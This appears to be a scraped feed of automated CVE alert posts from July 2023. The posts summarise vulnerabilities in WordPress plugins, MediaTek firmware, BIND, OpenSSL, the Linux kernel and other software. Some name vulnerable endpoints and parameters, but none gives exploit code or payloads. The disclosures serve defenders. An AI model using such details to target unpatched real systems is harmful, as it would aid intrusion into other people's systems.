🚨 CVE-2023-30259A Buffer Overflow vulnerability in importshp plugin in LibreCAD 2.2.0 allows attackers to obtain sensitive information via a crafted DBF file.🎖@cveNotify |
|
| 2023-07-05 20:58:14 |
🚨 CVE-2023-34928A stack overflow in the Edit_BasicSSID function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-07-05 20:58:13 |
🚨 CVE-2023-34929A stack overflow in the AddMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-07-05 20:58:12 |
🚨 CVE-2023-34932A stack overflow in the UpdateWanMode function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-07-05 18:58:36 |
🚨 CVE-2023-30757A vulnerability has been identified in Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions). The know-how protection feature in affected products does not properly update the encryption of existing program blocks when a project file is updated.This could allow attackers with access to the project file to recover previous - yet unprotected - versions of the project without the knowledge of the know-how protection password.🎖@cveNotify |
|
| 2023-07-05 18:58:34 |
🚨 CVE-2023-34254The GLPI Agent is a generic management agent. Prior to version 1.5, if glpi-agent is running remoteinventory task against an Unix platform with ssh command, an administrator user on the remote can manage to inject a command in a specific workflow the agent would run with the privileges it uses. In the case, the agent is running with administration privileges, a malicious user could gain high privileges on the computer glpi-agent is running on. A malicious user could also disclose all remote accesses the agent is configured with for remoteinventory task. This vulnerability has been patched in glpi-agent 1.5.🎖@cveNotify |
|
| 2023-07-05 18:58:32 |
🚨 CVE-2023-33565ROS2 (Robot Operating System 2) Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 are vulnerable to Denial-of-Service (DoS) attacks. A malicious user potentially exploited the vulnerability remotely and crashed the ROS2 nodes.🎖@cveNotify |
|
| 2023-07-05 18:58:31 |
🚨 CVE-2020-18416An cross site request forgery (CSRF) vulnerability discovered in Jymusic v2.0.0.,that allows attackers to execute arbitrary code via /admin.php?s=/addons/config.html&id=6 to modify payment information.🎖@cveNotify |
|
| 2023-07-05 18:58:29 |
🚨 CVE-2020-18410A stored cross site scripting (XSS) vulnerability in /index.php?admin-master-article-edit of Chaoji CMS v2.18 that allows attackers to obtain administrator privileges.🎖@cveNotify |
|
| 2023-07-05 18:58:28 |
🚨 CVE-2020-18413Stored cross site scripting (XSS) vulnerability in /index.php?admin-master-navmenu-add of Chaoji CMS v2.18 that allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-05 18:58:26 |
🚨 CVE-2020-18406An issue was discovered in cmseasy v7.0.0 that allows user credentials to be sent in clear text due to no encryption of form data.🎖@cveNotify |
|
| 2023-07-05 18:58:25 |
🚨 CVE-2023-34673Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting the publicly accessible Memcached service. The attack can occur over the public Internet in some cases.🎖@cveNotify |
|
| 2023-07-05 18:58:23 |
🚨 CVE-2023-25004A maliciously crafted pskernel.dll file in Autodesk products is used to trigger integer overflow vulnerabilities. Exploitation of these vulnerabilities may lead to code execution.🎖@cveNotify |
|
| 2023-07-05 18:58:22 |
🚨 CVE-2023-29068A maliciously crafted file consumed through pskernel.dll file could lead to memory corruption vulnerabilities. These vulnerabilities in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2023-07-05 18:58:20 |
🚨 CVE-2023-22593IBM Robotic Process Automation for Cloud Pak 21.0.1 through 21.0.7.3 and 23.0.0 through 23.0.3 is vulnerable to security misconfiguration of the Redis container which may provide elevated privileges. IBM X-Force ID: 244074.🎖@cveNotify |
|
| 2023-07-05 18:58:19 |
🚨 CVE-2023-23468IBM Robotic Process Automation for Cloud Pak 21.0.1 through 21.0.7.3 and 23.0.0 through 23.0.3 is vulnerable to insufficient security configuration which may allow creation of namespaces within a cluster. IBM X-Force ID: 244500.🎖@cveNotify |
|
| 2023-07-05 18:58:17 |
🚨 CVE-2020-18418A Cross site request forgery (CSRF) vulnerability was discovered in FeiFeiCMS v4.1.190209, which allows attackers to create administrator accounts via /index.php?s=Admin-Admin-Insert.🎖@cveNotify |
|
| 2023-07-05 18:58:16 |
🚨 CVE-2023-26274IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 248144.🎖@cveNotify |
|
| 2023-07-05 18:58:15 |
🚨 CVE-2023-26276IBM QRadar SIEM 7.5.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 248147.🎖@cveNotify |
|
| 2023-07-05 16:58:25 |
🚨 CVE-2022-4488The Widgets on Pages WordPress plugin before 1.8.0 does not validate and escape its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-07-05 16:58:21 |
🚨 CVE-2023-25003A maliciously crafted pskernel.dll file in Autodesk AutoCAD 2023 and Maya 2022 may be used to trigger out-of-bound read write / read vulnerabilities. Exploitation of this vulnerability may lead to code execution.🎖@cveNotify |
|
| 2023-07-05 06:58:16 |
🚨 CVE-2022-42175Insecure Direct Object Reference vulnerability in WHMCS module SolusVM 1 4.1.2 allows an attacker to change the password and hostname of other customer servers without authorization.🎖@cveNotify |
|
| 2023-07-05 06:58:15 |
🚨 CVE-2023-33201Bouncy Castle For Java before 1.74 is affected by an LDAP injection vulnerability. The vulnerability only affects applications that use an LDAP CertStore from Bouncy Castle to validate X.509 certificates. During the certificate validation process, Bouncy Castle inserts the certificate's Subject Name into an LDAP search filter without any escaping, which leads to an LDAP injection vulnerability.🎖@cveNotify |
|
| 2023-07-05 06:58:14 |
🚨 CVE-2023-33733Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.🎖@cveNotify |
|
| 2023-07-04 16:58:16 |
🚨 CVE-2023-3503A vulnerability has been found in SourceCodester Shopping Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert-product.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232951.🎖@cveNotify |
|
| 2023-07-04 16:58:15 |
🚨 CVE-2023-3504A vulnerability was found in SmartWeb Infotech Job Board 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /settings/account of the component My Profile Page. The manipulation of the argument filename leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-232952. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-04 16:58:14 |
🚨 CVE-2023-3502A vulnerability, which was classified as critical, was found in SourceCodester Shopping Website 1.0. Affected is an unknown function of the file search-result.php. The manipulation of the argument product leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-04 12:58:18 |
🚨 CVE-2022-22734The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them🎖@cveNotify |
|
| 2023-07-04 12:58:17 |
🚨 CVE-2023-2527The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-07-04 12:58:16 |
🚨 CVE-2022-3911The iubenda WordPress plugin before 3.3.3 does does not have authorisation and CSRF in an AJAX action, and does not ensure that the options to be updated belong to the plugin as long as they are arrays. As a result, any authenticated users, such as subscriber can grant themselves any privileges, such as edit_plugins etc🎖@cveNotify |
|
| 2023-07-04 12:58:14 |
🚨 CVE-2022-2552The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.🎖@cveNotify |
|
| 2023-07-04 10:58:35 |
🚨 CVE-2022-1598The WPQA Builder WordPress plugin before 5.5 which is a companion to the Discy and Himer , lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.🎖@cveNotify |
|
| 2023-07-04 10:58:34 |
🚨 CVE-2022-1589The Change wp-admin login WordPress plugin before 1.1.0 does not properly check for authorisation and is also missing CSRF check when updating its settings, which could allow unauthenticated users to change the settings. The attacked could also be performed via a CSRF vector🎖@cveNotify |
|
| 2023-07-04 10:58:33 |
🚨 CVE-2022-1203The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options🎖@cveNotify |
|
| 2023-07-04 10:58:32 |
🚨 CVE-2022-0952The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.🎖@cveNotify |
|
| 2023-07-04 10:58:31 |
🚨 CVE-2022-1092The myCred WordPress plugin before 2.4.3.1 does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog🎖@cveNotify |
|
| 2023-07-04 10:58:27 |
🚨 CVE-2022-0450The Menu Image, Icons made easy WordPress plugin before 3.0.6 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend🎖@cveNotify |
|
| 2023-07-04 10:58:26 |
🚨 CVE-2022-4623The ND Shortcodes WordPress plugin before 7.0 does not validate and escape numerous of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-07-04 10:58:25 |
🚨 CVE-2023-2010The Forminator WordPress plugin before 1.24.1 does not use an atomic operation to check whether a user has already voted, and then update that information. This leads to a Race Condition that may allow a single user to vote multiple times on a poll.🎖@cveNotify |
|
| 2023-07-04 10:58:21 |
🚨 CVE-2023-2320The CF7 Google Sheets Connector WordPress plugin before 5.0.2, cf7-google-sheets-connector-pro WordPress plugin through 5.0.2 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-07-04 10:58:20 |
🚨 CVE-2023-2324The Elementor Forms Google Sheet Connector WordPress plugin before 1.0.7, gsheetconnector-for-elementor-forms-pro WordPress plugin through 1.0.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-07-04 10:58:19 |
🚨 CVE-2023-3133The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.🎖@cveNotify |
|
| 2023-07-04 10:58:15 |
🚨 CVE-2023-3139The Protect WP Admin WordPress plugin before 4.0 discloses the URL of the admin panel via a redirection of a crafted URL, bypassing the protection offered.🎖@cveNotify |
|
| 2023-07-04 10:58:14 |
🚨 CVE-2022-0421The Five Star Restaurant Reservations WordPress plugin before 2.4.12 does not have authorisation when changing whether a payment was successful or failed, allowing unauthenticated users to change the payment status of arbitrary bookings. Furthermore, due to the lack of sanitisation and escaping, attackers could perform Cross-Site Scripting attacks against a logged in admin viewing the failed payments🎖@cveNotify |
|
| 2023-07-04 10:58:13 |
🚨 CVE-2022-0188The CMP WordPress plugin before 4.0.19 allows any user, even not logged in, to arbitrarily change the coming soon page layout.🎖@cveNotify |
|
| 2023-07-04 05:59:06 |
🚨 CVE-2023-20755In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07510064; Issue ID: ALPS07509605.🎖@cveNotify |
|
| 2023-07-04 05:59:05 |
🚨 CVE-2023-20690In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664735; Issue ID: ALPS07664735.🎖@cveNotify |
|
| 2023-07-04 05:59:04 |
🚨 CVE-2023-20689In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664741; Issue ID: ALPS07664741.🎖@cveNotify |
|
| 2023-07-04 05:59:03 |
🚨 CVE-2023-20754In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07563028; Issue ID: ALPS07588343.🎖@cveNotify |
|
| 2023-07-04 05:59:01 |
🚨 CVE-2023-20691In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664731; Issue ID: ALPS07664731.🎖@cveNotify |
|
| 2023-07-04 05:59:00 |
🚨 CVE-2023-20692In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664720; Issue ID: ALPS07664720.🎖@cveNotify |
|
| 2023-07-04 05:58:58 |
🚨 CVE-2023-20693In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664711; Issue ID: ALPS07664711.🎖@cveNotify |
|
| 2023-07-04 05:58:57 |
🚨 CVE-2023-20748In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07536951; Issue ID: ALPS07536951.🎖@cveNotify |
|
| 2023-07-04 05:58:56 |
🚨 CVE-2023-20753In rpmb, there is a possible out of bounds write due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07460390; Issue ID: ALPS07588667.🎖@cveNotify |
|
| 2023-07-04 05:58:54 |
🚨 CVE-2023-20759In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07636133; Issue ID: ALPS07634601.🎖@cveNotify |
|
| 2023-07-04 05:58:53 |
🚨 CVE-2023-20756In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07510064; Issue ID: ALPS07549928.🎖@cveNotify |
|
| 2023-07-04 05:58:52 |
🚨 CVE-2023-20757In cmdq, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07636133; Issue ID: ALPS07636133.🎖@cveNotify |
|
| 2023-07-04 05:58:51 |
🚨 CVE-2023-20758In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07636133; Issue ID: ALPS07636130.🎖@cveNotify |
|
| 2023-07-04 05:58:50 |
🚨 CVE-2023-20766In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573237; Issue ID: ALPS07573202.🎖@cveNotify |
|
| 2023-07-04 05:58:49 |
🚨 CVE-2023-20760In apu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07629578; Issue ID: ALPS07629578.🎖@cveNotify |
|
| 2023-07-04 05:58:47 |
🚨 CVE-2023-20761In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628604; Issue ID: ALPS07628582.🎖@cveNotify |
|
| 2023-07-04 05:58:46 |
🚨 CVE-2023-20768In ion, there is a possible out of bounds read due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560720; Issue ID: ALPS07559800.🎖@cveNotify |
|
| 2023-07-04 05:58:45 |
🚨 CVE-2023-20767In pqframework, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07629585; Issue ID: ALPS07629584.🎖@cveNotify |
|
| 2023-07-04 05:58:44 |
🚨 CVE-2023-20771In display, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07671046; Issue ID: ALPS07671046.🎖@cveNotify |
|
| 2023-07-04 05:58:42 |
🚨 CVE-2023-20772In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441796; Issue ID: ALPS07441796.🎖@cveNotify |
|
| 2023-07-03 23:58:34 |
🚨 CVE-2023-36162Cross Site Request Forgery vulnerability in ZZCMS v.2023 alows a remote attacker to gain privileges via the add function in adminlist.php.🎖@cveNotify |
|
| 2023-07-03 23:58:33 |
🚨 CVE-2023-36222Cross Site Scripting vulnerability in mlogclub bbs-go v. 3.5.5. and before allows a remote attacker to execute arbitrary code via a crafted payload to the comment parameter in the article function.🎖@cveNotify |
|
| 2023-07-03 23:58:32 |
🚨 CVE-2023-36262An issue in OBS Studio OBS-Studio v.29.1.2 allows a local attack to obtain sensitive information via the password parameter in locale/ca-ini.🎖@cveNotify |
|
| 2023-07-03 23:58:28 |
🚨 CVE-2023-36377Buffer Overflow vulnerability in mtrojnar osslsigncode v.2.3 and before allows a local attacker to execute arbitrary code via a crafted .exe, .sys, and .dll files.🎖@cveNotify |
|
| 2023-07-03 23:58:27 |
🚨 CVE-2023-26273IBM QRadar SIEM 7.5.0 could allow an authenticated user to perform unauthorized actions due to hazardous input validation. IBM X-Force ID: 248134.🎖@cveNotify |
|
| 2023-07-03 23:58:26 |
🚨 CVE-2023-35925FastAsyncWorldEdit (FAWE) is designed for efficient world editing. This vulnerability enables the attacker to select a region with the `Infinity` keyword (case-sensitive!) and executes any operation. This has a possibility of bringing the performing server down. This issue has been fixed in version 2.6.3.🎖@cveNotify |
|
| 2023-07-03 23:58:25 |
🚨 CVE-2022-4115The Editorial Calendar WordPress plugin through 3.7.12 does not sanitise and escape its settings, allowing users with roles as low as contributor to inject arbitrary web scripts in the plugin admin panel, enabling a Stored Cross-Site Scripting vulnerability targeting higher privileged users.🎖@cveNotify |
|
| 2023-07-03 23:58:21 |
🚨 CVE-2022-24754PJSIP is a free and open source multimedia communication library written in C language. In versions prior to and including 2.12 PJSIP there is a stack-buffer overflow vulnerability which only impacts PJSIP users who accept hashed digest credentials (credentials with data_type `PJSIP_CRED_DATA_DIGEST`). This issue has been patched in the master branch of the PJSIP repository and will be included with the next release. Users unable to upgrade need to check that the hashed digest data length must be equal to `PJSIP_MD5STRLEN` before passing to PJSIP.🎖@cveNotify |
|
| 2023-07-03 23:58:20 |
🚨 CVE-2022-24720image_processing is an image processing wrapper for libvips and ImageMagick/GraphicsMagick. Prior to version 1.12.2, using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input allows the attacker to execute shell commands. This method is called internally by Active Storage variants, so Active Storage is vulnerable as well. The vulnerability has been fixed in version 1.12.2 of image_processing. As a workaround, users who process based on user input should always sanitize the user input by allowing only a constrained set of operations.🎖@cveNotify |
|
| 2023-07-03 23:58:19 |
🚨 CVE-2022-21816NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (nvidia.ko), where a user in the guest OS can cause a GPU interrupt storm on the hypervisor host, leading to a denial of service.🎖@cveNotify |
|
| 2023-07-03 23:58:15 |
🚨 CVE-2022-23714A local privilege escalation (LPE) issue was discovered in the ransomware canaries features of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.🎖@cveNotify |
|
| 2023-07-03 23:58:14 |
🚨 CVE-2022-23708A flaw was discovered in Elasticsearch 7.17.0’s upgrade assistant, in which upgrading from version 6.x to 7.x would disable the in-built protections on the security index, allowing authenticated users with “*” index permissions access to this index.🎖@cveNotify |
|
| 2023-07-03 23:58:13 |
🚨 CVE-2022-23727There is a privilege escalation vulnerability in some webOS TVs. Due to wrong setting environments, local attacker is able to perform specific operation to exploit this vulnerability. Exploitation may cause the attacker to obtain a higher privilege🎖@cveNotify |
|
| 2023-07-03 21:58:22 |
🚨 CVE-2023-2533A Cross-Site Request Forgery (CSRF) vulnerability has been identified inPaperCut NG/MF, which, under specific conditions, could potentially enablean attacker to alter security settings or execute arbitrary code. This couldbe exploited if the target is an admin with a current login session. Exploitingthis would typically involve the possibility of deceiving an admin into clickinga specially crafted malicious link, potentially leading to unauthorized changes.🎖@cveNotify |
|
| 2023-07-03 21:58:21 |
🚨 CVE-2022-48331Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_save_keys feature_name_len integer overflow and resultant buffer overflow.🎖@cveNotify |
|
| 2023-07-03 21:58:18 |
🚨 CVE-2023-36301Talend Data Catalog before 8.0-20230221 contain a directory traversal vulnerability in HeaderImageServlet.🎖@cveNotify |
|
| 2023-07-03 21:58:17 |
🚨 CVE-2022-48332Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_save_keys file_name_len integer overflow and resultant buffer overflow.🎖@cveNotify |
|
| 2023-07-03 21:58:16 |
🚨 CVE-2022-48333Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_verify_keys prefix_len+feature_name_len integer overflow and resultant buffer overflow.🎖@cveNotify |
|
| 2023-07-03 21:58:15 |
🚨 CVE-2023-28016Host Header Injection vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows attacker to supply invalid input to cause the OSD Bare Metal Server to perform a redirect to an attacker-controlled domain.🎖@cveNotify |
|
| 2023-07-03 21:58:14 |
🚨 CVE-2023-23344A permission issue in BigFix WebUI Insights site version 14 allows an authenticated, unprivileged operator to access an administrator page.🎖@cveNotify |
|
| 2023-07-03 18:58:50 |
🚨 CVE-2023-0873The Kanban Boards for WordPress plugin before 2.5.21 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-07-03 18:58:49 |
🚨 CVE-2023-3316A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.🎖@cveNotify |
|
| 2023-07-03 18:58:48 |
🚨 CVE-2023-35759In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS.🎖@cveNotify |
|
| 2023-07-03 18:58:44 |
🚨 CVE-2023-3212A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.🎖@cveNotify |
|
| 2023-07-03 18:58:43 |
🚨 CVE-2023-2828Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers. The size limit for that cache database can be configured using the `max-cache-size` statement in the configuration file; it defaults to 90% of the total amount of memory available on the host. When the size of the cache reaches 7/8 of the configured limit, a cache-cleaning algorithm starts to remove expired and/or least-recently used RRsets from the cache, to keep memory use below the configured limit.It has been discovered that the effectiveness of the cache-cleaning algorithm used in `named` can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured `max-cache-size` limit to be significantly exceeded.This issue affects BIND 9 versions 9.11.0 through 9.16.41, 9.18.0 through 9.18.15, 9.19.0 through 9.19.13, 9.11.3-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-07-03 18:58:42 |
🚨 CVE-2023-2829A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record.This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-07-03 18:58:41 |
🚨 CVE-2023-2911If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow.This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-07-03 18:58:40 |
🚨 CVE-2023-3111A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().🎖@cveNotify |
|
| 2023-07-03 18:58:36 |
🚨 CVE-2023-2598A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.🎖@cveNotify |
|
| 2023-07-03 18:58:35 |
🚨 CVE-2023-2953A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.🎖@cveNotify |
|
| 2023-07-03 18:58:34 |
🚨 CVE-2023-2650Issue summary: Processing some specially crafted ASN.1 object identifiers ordata containing them may be very slow.Impact summary: Applications that use OBJ_obj2txt() directly, or use any ofthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no messagesize limit may experience notable to very long delays when processing thosemessages, which may lead to a Denial of Service.An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -most of which have no size limit. OBJ_obj2txt() may be used to translatean ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSLtype ASN1_OBJECT) to its canonical numeric text form, which are thesub-identifiers of the OBJECT IDENTIFIER in decimal form, separated byperiods.When one of the sub-identifiers in the OBJECT IDENTIFIER is very large(these are sizes that are seen as absurdly large, taking up tens or hundredsof KiBs), the translation to a decimal number in text may take a very longtime. The time complexity is O(n^2) with 'n' being the size of thesub-identifiers in bytes (*).With OpenSSL 3.0, support to fetch cryptographic algorithms using names /identifiers in string form was introduced. This includes using OBJECTIDENTIFIERs in canonical numeric text form as identifiers for fetchingalgorithms.Such OBJECT IDENTIFIERs may be received through the ASN.1 structureAlgorithmIdentifier, which is commonly used in multiple protocols to specifywhat cryptographic algorithm should be used to sign or verify, encrypt ordecrypt, or digest passed data.Applications that call OBJ_obj2txt() directly with untrusted data areaffected, with any version of OpenSSL. If the use is for the mere purposeof display, the severity is considered low.In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,CMS, CMP/CRMF or TS. It also impacts anything that processes X.509certificates, including simple things like verifying its signature.The impact on TLS is relatively low, because all versions of OpenSSL have a100KiB limit on the peer's certificate chain. Additionally, this onlyimpacts clients, or servers that have explicitly enabled clientauthentication.In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,such as X.509 certificates. This is assumed to not happen in such a waythat it would cause a Denial of Service, so these versions are considerednot affected by this issue in such a way that it would be cause for concern,and the severity is therefore considered low.🎖@cveNotify |
|
| 2023-07-03 18:58:33 |
🚨 CVE-2015-20108xml_security.rb in the ruby-saml gem before 1.0.0 for Ruby allows XPath injection and code execution because prepared statements are not used.🎖@cveNotify |
|
| 2023-07-03 18:58:29 |
🚨 CVE-2023-20883In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache.🎖@cveNotify |
|
| 2023-07-03 18:58:28 |
🚨 CVE-2023-30774A vulnerability was found in the libtiff library. This flaw causes a heap buffer overflow issue via the TIFFTAG_INKNAMES and TIFFTAG_NUMBEROFINKS values.🎖@cveNotify |
|
| 2023-07-03 18:58:27 |
🚨 CVE-2023-2731A NULL pointer dereference flaw was found in Libtiff's LZWDecode() function in the libtiff/tif_lzw.c file. This flaw allows a local attacker to craft specific input data that can cause the program to dereference a NULL pointer when decompressing a TIFF format file, resulting in a program crash or denial of service.🎖@cveNotify |
|
| 2023-07-03 18:58:26 |
🚨 CVE-2023-1891The Accordion & FAQ WordPress plugin before 1.9.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-07-03 16:58:40 |
🚨 CVE-2023-27908A maliciously crafted DLL file can be forced to write beyond allocated boundaries in the Autodesk installer when parsing the DLL files and could lead to a Privilege Escalation vulnerability.🎖@cveNotify |
|
| 2023-07-03 14:58:46 |
🚨 CVE-2023-2032The Custom 404 Pro WordPress plugin before 3.8.1 does not properly sanitize database inputs, leading to multiple SQL Injection vulnerabilities.🎖@cveNotify |
|
| 2023-07-03 14:58:45 |
